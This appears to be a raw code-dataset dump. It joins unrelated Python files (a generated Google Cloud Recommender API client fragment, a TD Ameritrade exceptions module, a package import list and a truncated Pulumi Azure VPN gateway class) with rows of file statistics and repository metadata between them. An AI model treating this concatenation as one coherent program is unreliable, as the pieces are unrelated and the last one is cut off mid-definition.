    Get.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
        http_method='GET',
        method_id='recommender.projects.locations.insightTypes.insights.get',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}',
        request_field='',
        request_type_name='RecommenderProjectsLocationsInsightTypesInsightsGetRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Insight',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.

        Args:
          request: (RecommenderProjectsLocationsInsightTypesInsightsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata; pagination is driven by the
    # filter/pageSize/pageToken query parameters.
    List.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
        http_method='GET',
        method_id='recommender.projects.locations.insightTypes.insights.list',
        ordered_params=['parent'],
        path_params=['parent'],
        query_params=['filter', 'pageSize', 'pageToken'],
        relative_path='v1alpha2/{+parent}/insights',
        request_field='',
        request_type_name='RecommenderProjectsLocationsInsightTypesInsightsListRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
        supports_download=False,
    )

    def MarkAccepted(self, request, global_params=None):
        r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.

        Args:
          request: (RecommenderProjectsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Insight) The response message.
        """
        config = self.GetMethodConfig('MarkAccepted')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
        http_method='POST',
        method_id='recommender.projects.locations.insightTypes.insights.markAccepted',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markAccepted',
        request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
        request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkAcceptedRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Insight',
        supports_download=False,
    )

    def MarkActive(self, request, global_params=None):
        r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.

        Args:
          request: (RecommenderProjectsLocationsInsightTypesInsightsMarkActiveRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Insight) The response message.
        """
        config = self.GetMethodConfig('MarkActive')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkActive.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
        http_method='POST',
        method_id='recommender.projects.locations.insightTypes.insights.markActive',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markActive',
        request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
        request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkActiveRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Insight',
        supports_download=False,
    )

    def MarkDismissed(self, request, global_params=None):
        r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.

        Args:
          request: (RecommenderProjectsLocationsInsightTypesInsightsMarkDismissedRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Insight) The response message.
        """
        config = self.GetMethodConfig('MarkDismissed')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
        http_method='POST',
        method_id='recommender.projects.locations.insightTypes.insights.markDismissed',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markDismissed',
        request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
        request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkDismissedRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Insight',
        supports_download=False,
    )
class ProjectsLocationsInsightTypesService(base_api.BaseApiService):
    """Service class for the projects_locations_insightTypes resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations_insightTypes'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsInsightTypesService, self).__init__(client)
        # Placeholder container for this (method-less) intermediate resource.
        self._upload_configs = {
            }
class ProjectsLocationsRecommendersConfigService(base_api.BaseApiService):
    """Service class for the projects_locations_recommenders_config resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations_recommenders_config'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsRecommendersConfigService, self).__init__(client)
        # No resumable-upload configurations exist for this service.
        self._upload_configs = {
            }

    def Commit(self, request, global_params=None):
        r"""Commits a Recommender Config change.

        Args:
          request: (GoogleCloudRecommenderV1alpha2RecommenderConfig) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
        """
        config = self.GetMethodConfig('Commit')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata; the '<request>' sentinel tells apitools
    # to send the entire request message as the HTTP body.
    Commit.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/config:commit',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.config.commit',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:commit',
        request_field='<request>',
        request_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
        response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
        supports_download=False,
    )
class ProjectsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
    """Service class for the projects_locations_recommenders_recommendations resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations_recommenders_recommendations'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsRecommendersRecommendationsService, self).__init__(client)
        # No resumable-upload configurations exist for this service.
        self._upload_configs = {
            }

    def Get(self, request, global_params=None):
        r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    Get.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
        http_method='GET',
        method_id='recommender.projects.locations.recommenders.recommendations.get',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}',
        request_field='',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsGetRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata; pagination is driven by the
    # filter/pageSize/pageToken query parameters.
    List.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
        http_method='GET',
        method_id='recommender.projects.locations.recommenders.recommendations.list',
        ordered_params=['parent'],
        path_params=['parent'],
        query_params=['filter', 'pageSize', 'pageToken'],
        relative_path='v1alpha2/{+parent}/recommendations',
        request_field='',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsListRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
        supports_download=False,
    )

    def MarkActive(self, request, global_params=None):
        r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkActiveRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('MarkActive')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkActive.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.recommendations.markActive',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markActive',
        request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkActiveRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )

    def MarkClaimed(self, request, global_params=None):
        r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('MarkClaimed')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.recommendations.markClaimed',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markClaimed',
        request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkClaimedRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )

    def MarkDismissed(self, request, global_params=None):
        r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('MarkDismissed')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.recommendations.markDismissed',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markDismissed',
        request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkDismissedRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )

    def MarkFailed(self, request, global_params=None):
        r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkFailedRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('MarkFailed')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.recommendations.markFailed',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markFailed',
        request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkFailedRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )

    def MarkSucceeded(self, request, global_params=None):
        r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Recommendation) The response message.
        """
        config = self.GetMethodConfig('MarkSucceeded')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
    MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
        http_method='POST',
        method_id='recommender.projects.locations.recommenders.recommendations.markSucceeded',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}:markSucceeded',
        request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
        request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkSucceededRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
        supports_download=False,
    )
class ProjectsLocationsRecommendersService(base_api.BaseApiService):
    """Service class for the projects_locations_recommenders resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations_recommenders'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsRecommendersService, self).__init__(client)
        # No resumable-upload configurations exist for this service.
        self._upload_configs = {
            }

    def GetConfig(self, request, global_params=None):
        r"""Gets the requested Recommender Config. There is only one instance of the config for each Recommender.

        Args:
          request: (RecommenderProjectsLocationsRecommendersGetConfigRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
        """
        config = self.GetMethodConfig('GetConfig')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client;
    # request_field='' means the request message carries no HTTP body.
    GetConfig.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/config',
        http_method='GET',
        method_id='recommender.projects.locations.recommenders.getConfig',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}',
        request_field='',
        request_type_name='RecommenderProjectsLocationsRecommendersGetConfigRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
        supports_download=False,
    )
class ProjectsLocationsService(base_api.BaseApiService):
    """Service class for the projects_locations resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsService, self).__init__(client)
        # Placeholder container for this (method-less) intermediate resource.
        self._upload_configs = {
            }
class ProjectsService(base_api.BaseApiService):
    """Service class for the projects resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsService, self).__init__(client)
        # Placeholder container for this (method-less) intermediate resource.
        self._upload_configs = {
            }
| 53.839433
| 516
| 0.754715
| 7,993
| 91,204
| 8.420493
| 0.037783
| 0.036907
| 0.028794
| 0.017428
| 0.82294
| 0.806864
| 0.802942
| 0.792512
| 0.768412
| 0.754119
| 0
| 0.00737
| 0.165387
| 91,204
| 1,693
| 517
| 53.871234
| 0.876826
| 0.322606
| 0
| 0.630454
| 1
| 0
| 0.354835
| 0.326465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068566
| false
| 0
| 0.002671
| 0
| 0.15049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d974861df4703c41ffb2b890de7b9a91b61c3ce
| 3,416
|
py
|
Python
|
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
annakoretchko/algo_trading
|
9ca1b9307c4d477888e5f2e7f6d4f57a03ca3399
|
[
"MIT"
] | 1
|
2022-01-12T14:49:52.000Z
|
2022-01-12T14:49:52.000Z
|
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
webclinic017/algo_trading-3
|
0ce3657dc7295ca6496f270f943f3e670ae199d2
|
[
"MIT"
] | null | null | null |
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
webclinic017/algo_trading-3
|
0ce3657dc7295ca6496f270f943f3e670ae199d2
|
[
"MIT"
] | 1
|
2021-09-10T17:50:44.000Z
|
2021-09-10T17:50:44.000Z
|
class TknExpError(Exception):
    """Raised when a refresh or access token has expired.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class ExdLmtError(Exception):
    """Raised when the server's query limit has been exceeded.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class NotNulError(Exception):
    """Raised when a null value is passed into a non-null field.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class ForbidError(Exception):
    """Raised on a forbidden response, typically when the app lacks
    access to the account.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class NotFndError(Exception):
    """Raised when the requested criteria cannot be found.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class ServerError(Exception):
    """Raised when the service has an error or the server cannot
    provide a response.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
class GeneralError(Exception):
    """Raised for any other >400 status code not covered by a more
    specific exception above.

    ### Arguments:
    ----
    Exception (Exception): The base python exception class
    """

    def __init__(self, message):
        """Store the server-supplied error text on the exception.

        Arguments:
        ----
        message (str): Pass in the message returned by the server.
        """
        super().__init__(message)
        self.message = message
| 28.231405
| 77
| 0.586651
| 356
| 3,416
| 5.47191
| 0.213483
| 0.118583
| 0.107803
| 0.107803
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0
| 0.001277
| 0.312061
| 3,416
| 121
| 78
| 28.231405
| 0.82766
| 0.535129
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0daea7c405852d13f94bc96d5912c5fef84caeb3
| 189
|
py
|
Python
|
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
from . import ddqn
from . import ddqn_for_all
from . import agent_simple
from . import environment_for_owndata
from . import reply_memory_simple
from . import swichable_normalization
| 27
| 38
| 0.809524
| 26
| 189
| 5.576923
| 0.5
| 0.413793
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15873
| 189
| 6
| 39
| 31.5
| 0.91195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0df81ad3a9e7122a916de6be494135d1d79a179a
| 35,543
|
py
|
Python
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PointToPointVpnGatewayArgs', 'PointToPointVpnGateway']
@pulumi.input_type
class PointToPointVpnGatewayArgs:
def __init__(__self__, *,
             connection_configuration: pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'],
             resource_group_name: pulumi.Input[str],
             scale_unit: pulumi.Input[int],
             virtual_hub_id: pulumi.Input[str],
             vpn_server_configuration_id: pulumi.Input[str],
             dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             location: Optional[pulumi.Input[str]] = None,
             name: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
    """
    The set of arguments for constructing a PointToPointVpnGateway resource.
    :param pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'] connection_configuration: A `connection_configuration` block as defined below.
    :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
    :param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
    :param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
    :param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
    :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
    :param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
    """
    # Required arguments are always recorded through pulumi's input mechanism.
    pulumi.set(__self__, "connection_configuration", connection_configuration)
    pulumi.set(__self__, "resource_group_name", resource_group_name)
    pulumi.set(__self__, "scale_unit", scale_unit)
    pulumi.set(__self__, "virtual_hub_id", virtual_hub_id)
    pulumi.set(__self__, "vpn_server_configuration_id", vpn_server_configuration_id)
    # Optional arguments are only recorded when supplied, so unset fields
    # stay absent from the resource args rather than being stored as None.
    if dns_servers is not None:
        pulumi.set(__self__, "dns_servers", dns_servers)
    if location is not None:
        pulumi.set(__self__, "location", location)
    if name is not None:
        pulumi.set(__self__, "name", name)
    if tags is not None:
        pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="connectionConfiguration")
def connection_configuration(self) -> pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']:
    """
    A `connection_configuration` block as defined below.
    """
    return pulumi.get(self, "connection_configuration")

@connection_configuration.setter
def connection_configuration(self, value: pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']):
    # Store through pulumi's input mechanism rather than as a plain attribute.
    pulumi.set(self, "connection_configuration", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="scaleUnit")
def scale_unit(self) -> pulumi.Input[int]:
"""
The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "scale_unit")
@scale_unit.setter
def scale_unit(self, value: pulumi.Input[int]):
pulumi.set(self, "scale_unit", value)
@property
@pulumi.getter(name="virtualHubId")
def virtual_hub_id(self) -> pulumi.Input[str]:
"""
The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_hub_id")
@virtual_hub_id.setter
def virtual_hub_id(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_hub_id", value)
@property
@pulumi.getter(name="vpnServerConfigurationId")
def vpn_server_configuration_id(self) -> pulumi.Input[str]:
"""
The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vpn_server_configuration_id")
@vpn_server_configuration_id.setter
def vpn_server_configuration_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpn_server_configuration_id", value)
@property
@pulumi.getter(name="dnsServers")
